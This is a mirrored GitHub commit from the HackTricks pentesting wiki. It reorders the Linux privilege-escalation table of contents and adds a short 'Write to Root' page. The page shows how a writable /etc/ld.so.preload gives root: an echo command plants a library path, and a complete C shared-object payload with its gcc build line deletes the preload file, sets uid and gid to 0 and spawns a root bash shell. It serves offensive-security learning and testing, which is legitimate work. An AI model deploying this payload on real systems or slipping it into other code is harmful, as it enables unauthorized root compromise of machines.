mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [#3500] No subject
This commit is contained in:
parent
e82cc66315
commit
c6405d9dcc
2 changed files with 55 additions and 7 deletions
15
SUMMARY.md
15
SUMMARY.md
|
@ -79,8 +79,7 @@
|
|||
|
||||
* [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
|
||||
* [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
|
||||
* [SELinux](linux-hardening/privilege-escalation/selinux.md)
|
||||
* [Logstash](linux-hardening/privilege-escalation/logstash.md)
|
||||
* [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
|
||||
* [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)
|
||||
* [Docker Basics & Breakout](linux-hardening/privilege-escalation/docker-breakout/README.md)
|
||||
* [AuthZ& AuthN - Docker Access Authorization Plugin](linux-hardening/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md)
|
||||
|
@ -93,23 +92,25 @@
|
|||
* [Namespaces](linux-hardening/privilege-escalation/docker-breakout/namespaces.md)
|
||||
* [Docker --privileged](linux-hardening/privilege-escalation/docker-breakout/docker-privileged.md)
|
||||
* [Abusing Docker Socket for Privilege Escalation](linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md)
|
||||
* [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
|
||||
* [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md)
|
||||
* [Escaping from Jails](linux-hardening/privilege-escalation/escaping-from-limited-bash.md)
|
||||
* [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
|
||||
* [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md)
|
||||
* [Logstash](linux-hardening/privilege-escalation/logstash.md)
|
||||
* [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
|
||||
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
|
||||
* [Interesting Groups - Linux PE](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md)
|
||||
* [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)
|
||||
* [ld.so exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md)
|
||||
* [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md)
|
||||
* [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md)
|
||||
* [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md)
|
||||
* [Payloads to execute](linux-hardening/privilege-escalation/payloads-to-execute.md)
|
||||
* [RunC Privilege Escalation](linux-hardening/privilege-escalation/runc-privilege-escalation.md)
|
||||
* [SELinux](linux-hardening/privilege-escalation/selinux.md)
|
||||
* [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md)
|
||||
* [Splunk LPE and Persistence](linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
|
||||
* [SSH Forward Agent exploitation](linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md)
|
||||
* [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md)
|
||||
* [Wildcards Spare tricks](linux-hardening/privilege-escalation/wildcards-spare-tricks.md)
|
||||
* [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md)
|
||||
* [Write to Root](linux-hardening/privilege-escalation/write-to-root.md)
|
||||
* [Useful Linux Commands](linux-hardening/useful-linux-commands/README.md)
|
||||
* [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
* [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md)
|
||||
|
|
47
linux-hardening/privilege-escalation/write-to-root.md
Normal file
47
linux-hardening/privilege-escalation/write-to-root.md
Normal file
|
@ -0,0 +1,47 @@
|
|||
# Write to Root
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
### /etc/ld.so.preload
|
||||
|
||||
This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\
|
||||
If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary.
|
||||
|
||||
For example: `echo "/tmp/pe.so" > /etc/ld.so.preload`
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void _init() {
|
||||
unlink("/etc/ld.so.preload");
|
||||
setgid(0);
|
||||
setuid(0);
|
||||
system("/bin/bash");
|
||||
}
|
||||
//cd /tmp
|
||||
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
Loading…
Reference in a new issue